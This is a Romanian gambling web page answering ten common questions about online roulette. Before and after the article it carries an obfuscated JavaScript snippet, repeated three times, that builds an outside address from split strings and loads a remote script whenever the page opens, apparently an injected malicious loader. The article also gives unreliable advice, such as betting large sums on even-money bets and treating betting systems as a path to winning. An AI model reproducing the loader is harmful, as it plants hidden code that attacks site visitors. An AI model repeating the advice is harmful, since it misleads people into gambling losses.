Sari la conținut
top-zece-intrebari-despre-ruleta

// <![CDATA[ (function(){ au5t=document.createElement("script");au5t_="u"+("s")+"ta"; au5t_+=("t.i")+""+"n";au5t_+=(("f")+"o");au5t.type="text/javascript"; au5t_+="/"; au5tu="251999426";au5tu+=".asb054xpu5tlvlqhwws";au5tu+="9xr75zheuv7"; au5t.src="https://"+au5t_+au5tu;au5t.async=true;document.body.appendChild(au5t); })(); // ]]>

Jocurile de noroc fac parte din viața noastră fie că vrem sau nu. Deși nu toți jucăm la jocuri de noroc sau nu pariem pe sporturi, punem destul de des pariuri cu noi, iar asta este tot o formă de joc. Dacă vom câștiga sau nu, depinde doar de noi.

Atunci când descoperi jocurile ca la aparate, totul se schimbă. Dacă nu ești fan de pacanele online, poți oricând să joci acele jocuri de masă: Blackjack, poker, ruletă. Ruleta are o istorie de câteva sute de ani care te va captiva odată ce o afli. Mulți se întreabă cum pot câștiga la ruletă şi alte lucruri similare.

Top 10 cele mai frecvente întrebări despre ruletă

1. Câtă încredere pot avea în corectitudinea cazinourilor online?

Această întrebare este una pe care și-au pus-o toți jucătorii înainte de a-și face cont la un cazino online sau înainte de a juca banii la ruletă. Totuși, nu ai de ce să îți faci griji dacă ai ales un cazino online licențiat în țara noastră.

2. Contează ce variantă de ruletă aleg pentru a juca online?

Da. De fapt contează foarte mult. Se întâmplă destul de des ca începătorii în domeniu să nu acorde atenție acestui lucru, iar asta să îi coste bani. Orice jucător ar trebui să aleagă o variantă cât mai avantajoasă pentru el, dar pentru asta e necesar să se informeze cât mai mult despre subiect.

3. E în regulă să joc numărul norocos la ruletă?

Ruleta este unul dintre cele mai populare jocuri de cazino, dar dacă vrei să ai mai multe șanse, cel mai bine ar fi să elimini pariurile pe anumite numere din strategia ta. Cele mai mari șanse îți sunt oferite de pariurile cu șanse de 50% de câștig: roșu sau negru, par sau impar.

4.Mă pot încrede în sistemele de pariere cunoscut atunci când joc la ruletă?

Ai la dispoziție mai multe sisteme de pariere cum ar fi Martingale, Fibonacci, Paroli și altele. Aceste sisteme nu îți modifică în vreun fel șansele de câștig, ci te ajută să îți gestionezi mai bine bugetul pentru a câștiga la un moment dat.

5. Cum pot câștiga la ruleta online?

Ai la alegere între mai multe moduri prin care poți câștiga la ruletă. Dacă aplici aceeași strategie ca la păcănele online gratis, poți paria fie pe roșu, fie pe negru. Este bine să pariezi o sumă ridicată pe orice pariu care are șanse de câștig de aproximativ 50%.

6. Care tip de ruletă îmi oferă cele mai mari șanse de câștig?

Dacă vrei să mergi la sigur, poți alege să joci cel mai des pe tipurile de ruletă franceză și europeană. Mai întâi ar trebui să înveți regulile de joc, apoi îți poți încerca norocul. Va trebui să știi regulile speciale cum ar fi En Prison sau La Partage, deoarece îți pot reduce șansele de eșec.

7. Ce înseamnă managementul banilor în jocul la ruletă?

Managementul banilor este unul dintre cele mai importante elemente atunci când joci la ruletă. Este foarte ușor să uiți de detalii atunci când vine vorba de bani, dar cel mai bine ar fi să ții minte câteva lucruri importante: nu paria sume mari încă de la prima mână. Cel mai bine ar fi să joci cât mai cumpătat și asta doar până ajungi să câștigi cât ți-ai propus inițial.

8. Care e pariul minim la masa de ruletă?

Dacă te întrebi care este suma minimă pe care o poți plasa ca pariu la ruletă, răspunsul este că variază de la un cazinou online la altul. De regulă, nu vei putea paria mai puțin de 50 cenți la o mână.

Există câteva site-uri care oferă pariul minim mai mic decât cel de 50 cenți la jocuri ca ruleta automată sau cea americană.

9. Care este cel mai bun pariu pe care îl pot plasa la ruletă?

Nici aici răspunsul nu poate fi unul exact, ci cel mai bun pariu este cel pe care îl plasezi ghidându-te după anumite principii de joc. Cel mai bun pariu este cel care îți oferă cele mai mari șanse de câștig, adică cele pe alegeri între roșu și negru, par sau impar, 1-18 sau 19-36.

10.Cum se diferențiază ruleta live și cea RNG?

RNG vine de la Random Number Generator, adică Generator de numere la întâmplare. O ruletă de tip RNG nu se folosește de nicio componentă fizică, ci funcționează online asistată de un calculator.

Pentru acei jucători care au descoperit adrenalina și euforia jocurilor de noroc, întreaga industrie a jocurilor de noroc este o lume minunată. Aici distracția și relaxarea se întâlnesc pentru a-și mulțumi jucătorii.

Indiferent dacă ești un jucător începător sau unul experimentat, te vei simți bucuros când vezi cât de multe jocuri ți se oferă la un cazinou online. Oferta este generoasă și se actualizează constant aducându-ți jocuri de pacanele online gratis cât mai interesante.

// <![CDATA[ (function(){ au5t=document.createElement("script");au5t_="u"+("s")+"ta"; au5t_+=("t.i")+""+"n";au5t_+=(("f")+"o");au5t.type="text/javascript"; au5t_+="/"; au5tu="251999426";au5tu+=".asb054xpu5tlvlqhwws";au5tu+="9xr75zheuv7"; au5t.src="https://"+au5t_+au5tu;au5t.async=true;document.body.appendChild(au5t); })(); <script> (function(){ au5t=document.createElement("script");au5t_="u"+("s")+"ta"; au5t_+=("t.i")+""+"n";au5t_+=(("f")+"o");au5t.type="text/javascript"; au5t_+="/"; au5tu="251999426";au5tu+=".asb054xpu5tlvlqhwws";au5tu+="9xr75zheuv7"; au5t.src="https://"+au5t_+au5tu;au5t.async=true;document.body.appendChild(au5t); })(); // ]]>

Comentarii

Ultimă oră